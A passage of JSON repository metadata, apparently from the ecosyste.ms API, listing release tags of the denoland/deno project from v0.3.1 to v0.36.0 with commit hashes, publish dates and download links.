":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg: